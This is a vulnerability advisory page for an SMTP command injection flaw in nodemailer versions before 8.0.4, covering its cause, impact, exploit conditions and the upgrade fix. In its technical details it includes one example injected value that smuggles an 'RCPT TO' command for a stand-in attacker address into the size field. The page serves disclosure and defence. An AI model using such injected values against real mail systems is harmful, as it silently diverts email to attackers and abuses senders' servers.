GHSA-c7w3-x93f-qmm8
SMTP Command Injection vulnerability in nodemailer (npm)

SMTP Command Injection No known exploit

What is GHSA-c7w3-x93f-qmm8 About?

This vulnerability allows for SMTP command injection in Nodemailer when a custom `envelope` object with CRLF characters in its `size` property is passed to `sendMail()`. This direct concatenation into the SMTP `MAIL FROM` command allows attackers to inject arbitrary SMTP commands. Exploitation relies on applications explicitly using custom envelope objects and accepting user-controlled input for the `size` property.

Affected Software

nodemailer <8.0.4

Technical Details

The vulnerability exists in lib/smtp-connection/index.js, where the envelope.size value is directly appended to the SMTP MAIL FROM command without proper sanitization for CRLF characters. Specifically, when this._envelope.size is present and SIZE extension is supported, args.push('SIZE=' + this._envelope.size) concatenates the value. If an attacker can control envelope.size to include (CRLF), they can terminate the MAIL FROM command prematurely and inject subsequent SMTP commands. For instance, SIZE=100 RCPT TO:<attacker@evil.com> would result in MAIL FROM: <sender@example.com> SIZE=100 being sent, immediately followed by RCPT TO:<attacker@evil.com>, effectively adding a hidden recipient. While other envelope parameters are sanitized, size is copied verbatim from the custom envelope and is therefore vulnerable.

What is the Impact of GHSA-c7w3-x93f-qmm8?

Successful exploitation may allow attackers to silently add hidden recipients to emails, inject arbitrary SMTP commands (e.g., additional `MAIL FROM`), and leverage the sending organization's SMTP server reputation for spam or phishing campaigns.

What is the Exploitability of GHSA-c7w3-x93f-qmm8?

Exploitation requires the application to explicitly define a custom envelope object with a size property and pass user-controlled input into this size field. The complexity is moderate, as it requires knowledge of SMTP protocols and the specific Nodemailer API usage. No authentication is required if the application exposes this functionality to unauthenticated users. The attack is remote, as it involves crafting input to a web application. Constraints include the need for the SIZE SMTP extension to be supported by the mail server and for the application to use custom envelope objects, which is not Nodemailer's default behavior. The risk increases for applications that expose envelope configuration to users via APIs or administrative interfaces.

What are the Known Public Exploits?

PoC Author Link Commentary
No known exploits

What are the Available Fixes for GHSA-c7w3-x93f-qmm8?

Available Upgrade Options

  • nodemailer
    • <8.0.4 → Upgrade to 8.0.4

Struggling with dependency upgrades?

See how Resolved Security's drop-in replacements make it simple.

Book a demo

Additional Resources

What are Similar Vulnerabilities to GHSA-c7w3-x93f-qmm8?

Similar Vulnerabilities: CVE-2023-28434 , CVE-2020-15507 , CVE-2018-1000100 , CVE-2017-1000499 , CVE-2019-14867

All Rights reserved 2025
Privacy Policy